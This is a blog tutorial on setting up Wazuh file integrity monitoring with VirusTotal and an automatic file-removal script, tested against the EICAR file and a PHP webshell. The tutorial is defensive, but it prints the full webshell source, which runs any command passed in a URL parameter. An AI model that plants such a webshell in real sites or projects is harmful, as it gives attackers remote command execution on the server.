Open in app

Sign in

Write

Sign in

Blue Teaming with Wazuh Pt 3: Detecting and Removing Threats with VirusTotal Integration

Daniel Edwards
5 min readDec 29, 2023

--

Wazuh’s File Integrity Monitoring module allows us to connect to the Virus Total API, using it to scan files in our directories and monitor & alert for changes. When active response is enabled, the files can be automatically removed when VirusTotal’s rules are triggered.

Requirements:

  • VirusTotal API Key
  • Attacker Machine
  • Victim Machine(s)
  • Wazuh Agents on each machine
  • jq, to handle JSON and/or JS files
  • A script to delete the malicious file
  • Malware samples

Prepare the Ossec.conf Agent on Ubuntu Target

Configure the appropriate settings to ensure Wazuh is monitoring our intended directory. On each victim machine, edit the ossec.conf file (this is Wazuh’s agent)

  1. Installing jq:
sudo apt update
sudo apt -y install jq

2. In /var/ossec/etc/ossec.conf search for the field <syscheck> and set <disabled> to no.

3. Place your intended directory, e.g. Downloads, under the File Integrity Monitoring section:

<directories realtime="yes">/home/user/Downloads</directories>

4. Create a bash script to remove the suspect file

#!/bin/bash

LOCAL=`dirname $0`;
cd $LOCAL
cd ../

PWD=`pwd`

read INPUT_JSON
FILENAME=$(echo $INPUT_JSON | jq -r .parameters.alert.data.virustotal.source.file)
COMMAND=$(echo $INPUT_JSON | jq -r .command)
LOG_FILE="${PWD}/../logs/active-responses.log"

#------------------------ Analyze command -------------------------#
if [ ${COMMAND} = "add" ]
then
 # Send control message to execd
 printf '{"version":1,"origin":{"name":"remove-threat","module":"active-response"},"command":"check_keys", "parameters":{"keys":[]}}\n'

 read RESPONSE
 COMMAND2=$(echo $RESPONSE | jq -r .command)
 if [ ${COMMAND2} != "continue" ]
 then
  echo "`date '+%Y/%m/%d %H:%M:%S'` $0: $INPUT_JSON Remove threat active response aborted" >> ${LOG_FILE}
  exit 0;
 fi
fi

# Removing file
rm -f $FILENAME
if [ $? -eq 0 ]; then
 echo "`date '+%Y/%m/%d %H:%M:%S'` $0: $INPUT_JSON Successfully removed threat" >> ${LOG_FILE}
else
 echo "`date '+%Y/%m/%d %H:%M:%S'` $0: $INPUT_JSON Error removing threat" >> ${LOG_FILE}
fi

exit 0;

5. Change the file and ownership on the newely created script

sudo chmod 750 /var/ossec/active-response/bin/remove-threat.sh; sudo chown root:wazuh /var/ossec/active-response/bin/remove-threat.sh

6. Apply the changes by restarting the Wazuh manager.

sudo systemctl restart wazuh-agent

Wazuh Server Configuration

The Ubuntu endpoint is now appropriately configured, unto the Wazuh server. These changes are to allow alerts in near real time, active response will be triggered when a suspect file is detected. The files we’ll be editing:

  • ossec.conf
  • local_rules.xml
  • remove-threat.sh

Edit the /var/ossec/etc/rules/local_rules.xml file to include the rules in the following file:

<group name="syscheck,pci_dss_11.5,nist_800_53_SI.7,">
    <!-- Rules for Linux systems -->
    <rule id="100200" level="7">
        <if_sid>550</if_sid>
        <field name="file">/home/dan/Downloads</field>
        <description>File modified in /dan/Downloads directory.</description>
    </rule>
    <rule id="100201" level="7">
        <if_sid>554</if_sid>
        <field name="file">home/dan/Downloads</field>
        <description>File added to /dan/Downloads directory.</description>
    </rule>
</group>

Remember to change your directory path!

Enable the VirusTotal Integration by editing the /var/ossec/etc/ossec.conf file. Be sure to replace <YOUR_VIRUS_TOTAL_API_KEY> with your VirusTotal API key. When the rule_ids 100200 and 100201 are triggered VirtusTotal will execute it’s queries.

<ossec_config>
  <integration>
    <name>virustotal</name>
    <api_key><YOUR_VIRUS_TOTAL_API_KEY></api_key> <!-- Replace with your VirusTotal API key -->
    <rule_id>100200,100201</rule_id>
    <alert_format>json</alert_format>
  </integration>
</ossec_config>

Enable active reponse to execute the remove-threat.sh file. This rule will trigger whenever VirusTotal marks a flag as malicious. Make the following edits to /var/ossec/etc/ossec.conf:

<ossec_config>
  <command>
    <name>remove-threat</name>
    <executable>remove-threat.sh</executable>
    <timeout_allowed>no</timeout_allowed>
  </command>

  <active-response>
    <disabled>no</disabled>
    <command>remove-threat</command>
    <location>local</location>
    <rules_id>87105</rules_id>
  </active-response>
</ossec_config>

Add the following rules to /var/ossec/etc/rules/local_rules.xml to ensure Wazuh receives the alert about the results from active response:

<group name="virustotal,">
  <rule id="100092" level="12">
    <if_sid>657</if_sid>
    <match>Successfully removed threat</match>
    <description>$(parameters.program) removed threat located at $(parameters.alert.data.virustotal.source.file)</description>
  </rule>

  <rule id="100093" level="12">
    <if_sid>657</if_sid>
    <match>Error removing threat</match>
    <description>Error removing threat located at $(parameters.alert.data.virustotal.source.file)</description>
  </rule>
</group>

Restart the server

sudo systemctl restart wazuh-manager

HINT: If Wazuh gives you the following error message: “Job for wazuh-manager.service failed because the control process exited with error code. journalctl -xeu wazuh-manager service” ….

verify your ossec.conf file with xmllint. It will identify configuration errors and point you in the right direction.

Executing Attacks

In order to simulate and view our attacks in Wazuh we need to place agents on both the attacker and victim machines to monitor their activity. Check out my first article in this series to learn how.

We’ll also be using real malware from these sources. Please be VERY careful when executing these and ensure your virtual machines are not touching your main network!

Test 1: Eicar file

On the Ubuntu machine, execute the curl command in the downloads folder. I’ve also demonstrated how quickly Wazuh removes the eicar file in the gif following:

curl -LO https://secure.eicar.org/eicar.com && ls -lah eicar.com
  • Wazuh detected the file being downloaded in the /home/dan directory
  • Virus Total alert was generated, indicating 66 detection engines detected the file. MiTRE technique T1203
  • File was deleted, showing the tactics, techniques and sub techniques utilized
  • Active response script, remove-threat.sh, activated and removed the file
Wazuh detecting and removing eicar file

Test 2: PHP Webshell

Use the following code from github.com/joswr1ght to test webshell detection and removal

<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
    if(isset($_GET['cmd']))
    {
        system($_GET['cmd']);
    }
?>
</pre>
</body>
</html>

src: https://gist.github.com/joswr1ght/22f40787de19d80d110b37fb79ac3985

source: easy-simple-php-webshell.php

The last four alerts are generated for the download, though it took a tad bit longer to analyze and remove the php shell.

Conclusion

We’ve tested Wazuh’s detection capabilties integrated with VirusTotal and I have to say, I’m quite impressed. This integration is quite powerful, I may make a future edit to see what else this integration can detect, configure it to monitor other directories etc.,. If you have any ideas, questions, comments and/concerns, please let me know!

Wazuh
Cybersecurity
Penetration Testing
Malware
Siem

--

--

Daniel Edwards

Written by Daniel Edwards

65 Followers

Padawon Pentester and dabbler in many things infoSec related

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams